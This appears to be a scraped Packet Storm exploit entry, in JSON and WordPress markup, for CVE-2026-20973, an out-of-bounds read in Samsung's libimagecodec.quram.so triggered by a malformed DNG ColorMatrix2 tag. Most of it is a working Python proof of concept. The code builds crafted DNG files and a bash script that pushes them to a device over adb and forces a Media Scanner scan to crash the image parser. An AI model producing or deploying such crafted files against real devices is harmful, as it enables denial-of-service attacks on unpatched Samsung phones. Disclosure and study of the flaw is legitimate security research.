{“lastseen”:”2026-02-18T17:33:12″,”description”:”A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from improper bounds validation when parsing the ColorMatrix2 0xC622…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:215820″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-20973″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung libimagecodec.quram.so Out-of-Bounds Read via Malformed DNG ColorMatrix2 |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.samsung.com\/us\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG (Digital Negative) image files.\\n The issue stems from improper bounds validation when parsing the ColorMatrix2 (0xC622) tag within DNG metadata.\\n By supplying a crafted DNG file containing a malformed ColorMatrix2 tag with an unexpected number of entries, the library incorrectly derives the number of color \\n \\t\\t\\t\\t planes and subsequently performs memory access beyond the allocated buffer. This results in an Out-of-Bounds Read, leading to a process crash (SIGSEGV) during image parsing.\\n \\t\\t\\t\\t The vulnerability can be triggered automatically through the Android Media Scanner or manually by opening the malicious DNG file in gallery applications, \\n \\t\\t\\t\\t without requiring user interaction beyond file presence.\\n While the observed impact is a denial of service, the flaw represents a broader risk class associated with unsafe metadata parsing in privileged media components.\\n Samsung addressed this issue in the January 2026 security update\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import struct\\n import os\\n \\n def create_malicious_dng(filename=\\”poc.dng\\”):\\n \\”\\”\\”\\n Creates a malicious DNG file that causes the Samsung library to crash\\n \\”\\”\\”\\n data = bytearray()\\n data += b’II’ \\n data += struct.pack(‘\\u003cH’, 42) \\n data += struct.pack(‘\\u003cI’, 8) \\n ifd0_offset = len(data)\\n data += struct.pack(‘\\u003cH’, 13) \\n data += struct.pack(‘\\u003cHHII’, 0x00FE, 4, 1, 0)\\n data += struct.pack(‘\\u003cHHII’, 0x0100, 4, 1, 400)\\n data += struct.pack(‘\\u003cHHII’, 0x0101, 4, 1, 400)\\n data += struct.pack(‘\\u003cHHII’, 0x0102, 3, 1, 0x10)\\n data += struct.pack(‘\\u003cHHII’, 0x0106, 3, 1, 32803)\\n make_data = b\\”External\\\\x00\\”\\n data += struct.pack(‘\\u003cHHII’, 0x010F, 2, len(make_data), 0xAA)\\n data += struct.pack(‘\\u003cHHII’, 0x0111, 4, 400, 0xB2)\\n data += struct.pack(‘\\u003cHHII’, 0x0116, 4, 1, 1)\\n data += struct.pack(‘\\u003cHHII’, 0x0117, 4, 400, 0x6F2)\\n data += struct.pack(‘\\u003cHHII’, 0x828D, 1, 2, 0x202)\\n data += struct.pack(‘\\u003cHHII’, 0x828E, 1, 4, 0x10001)\\n data += struct.pack(‘\\u003cHHII’, 0xC612, 1, 4, 0x4010000)\\n data += struct.pack(‘\\u003cHHII’, 0xC622, 9, 6, 0xD32)\\n data += struct.pack(‘\\u003cI’, 0)\\n data[0x10:0x10] = struct.pack(‘\\u003cH’, 16)\\n data[0xAA:0xAA] = make_data\\n strip_offsets = b”\\n for i in range(400):\\n strip_offsets += struct.pack(‘\\u003cI’, i * 800) \\n data[0xB2:0xB2] = strip_offsets\\n data[0x202:0x202] = b’\\\\x02\\\\x02’\\n data[0x10001:0x10001] = b’\\\\x01\\\\x00\\\\x01\\\\x00’\\n data[0x4010000:0x4010000] = b’\\\\x01\\\\x04\\\\x00\\\\x00’\\n color_matrix = b”\\n for i in range(6):\\n color_matrix += struct.pack(‘\\u003ci’, 1000 + i) \\n data[0xD32:0xD32] = color_matrix\\n \\n strip_counts = b”\\n for i in range(400):\\n strip_counts += struct.pack(‘\\u003cI’, 800) \\n data[0x6F2:0x6F2] = strip_counts\\n fake_pixel_data = b’\\\\x00′ * 320000 \\n data.extend(fake_pixel_data)\\n with open(filename, ‘wb’) as f:\\n f.write(data)\\n \\n print(f\\”[+] Malicious DNG file created: {filename}\\”)\\n print(f\\”[+] Size: {len(data)} bytes\\”)\\n \\n return filename\\n \\n def create_trigger_script():\\n \\”\\”\\”\\n Creates a script to trigger the vulnerability on the device\\n \\”\\”\\”\\n script = \\”\\”\\”#!\/bin\/bash\\n echo \\”[*] Sending malicious DNG file to device…\\”\\n adb push poc.dng \/storage\/emulated\/0\/DCIM\/\\n \\n echo \\”[*] Triggering Media Scanner scan…\\”\\n adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/poc.dng\\n \\n echo \\”[*] To monitor the crash, run:\\”\\n echo \\” adb logcat | grep -A 20 -B 5 ‘SIGSEGV’\\”\\n echo \\” adb logcat | grep -A 30 ‘Fatal signal’\\”\\n echo \\”\\”\\n echo \\”[*] Or open the file manually in the Gallery app\\”\\n \\”\\”\\”\\n \\n with open(\\”trigger_exploit.sh\\”, \\”w\\”) as f:\\n f.write(script)\\n \\n os.chmod(\\”trigger_exploit.sh\\”, 0o755)\\n print(\\”[+] Execution script created: trigger_exploit.sh\\”)\\n \\n def create_simple_poc():\\n \\”\\”\\”\\n A very simplified version of the malicious file\\n \\”\\”\\”\\n poc = bytearray()\\n poc += b’II’ + struct.pack(‘\\u003cH’, 42) + struct.pack(‘\\u003cI’, 8)\\n ifd_offset = len(poc)\\n poc += struct.pack(‘\\u003cH’, 8)\\n poc += struct.pack(‘\\u003cHHII’, 0x0100, 4, 1, 400) \\n poc += struct.pack(‘\\u003cHHII’, 0x0101, 4, 1, 400)\\n poc += struct.pack(‘\\u003cHHII’, 0x0102, 3, 1, 16) \\n poc += struct.pack(‘\\u003cHHII’, 0x0106, 3, 1, 32803) \\n poc += struct.pack(‘\\u003cHHII’, 0x0116, 4, 1, 1)\\n poc += struct.pack(‘\\u003cHHII’, 0x0117, 4, 400, 0x100)\\n poc += struct.pack(‘\\u003cHHII’, 0xC612, 1, 4, 0x200)\\n poc += struct.pack(‘\\u003cHHII’, 0xC622, 9, 6, 0x300)\\n poc += struct.pack(‘\\u003cI’, 0)\\n poc.extend(b’\\\\x00′ * 0x300) \\n for i in range(6):\\n poc += struct.pack(‘\\u003ci’, 0x1000 + i)\\n poc[0x200:0x200] = b’\\\\x01\\\\x04\\\\x00\\\\x00’\\n poc[0x100:0x100] = b’\\\\x00\\\\x00\\\\x03\\\\x20′ * 400 # 800 per strip\\n \\n with open(\\”simple_poc.dng\\”, \\”wb\\”) as f:\\n f.write(poc)\\n \\n print(\\”[+] Simplified file created: simple_poc.dng\\”)\\n print(\\”[!] This file might not work on all devices\\”)\\n \\n def main():\\n print(\\”=\\” * 60)\\n print(\\”PoC for Samsung libimagecodec.quram.so – CVE-2026-20973\\”)\\n print(\\”=\\” * 60)\\n print()\\n print(\\”[1] Create full malicious DNG file\\”)\\n print(\\”[2] Create simplified DNG file\\”)\\n print(\\”[3] Create execution script\\”)\\n print()\\n \\n choice = input(\\”Select option (1\/2\/3): \\”).strip()\\n \\n if choice == \\”1\\”:\\n create_malicious_dng()\\n elif choice == \\”2\\”:\\n create_simple_poc()\\n elif choice == \\”3\\”:\\n create_trigger_script()\\n else:\\n print(\\”[!] Invalid option\\”)\\n \\n print()\\n print(\\”=\\” * 60)\\n print(\\”Notes:\\”)\\n print(\\”- Vulnerability patched in January 2026 update\\”)\\n print(\\”- CVE number: CVE-2026-20973\\”)\\n print(\\”- For educational and security research purposes only!\\”)\\n print(\\”=\\” * 60)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215820″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215820\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T17:33:12″,”description”:”A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-41398","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n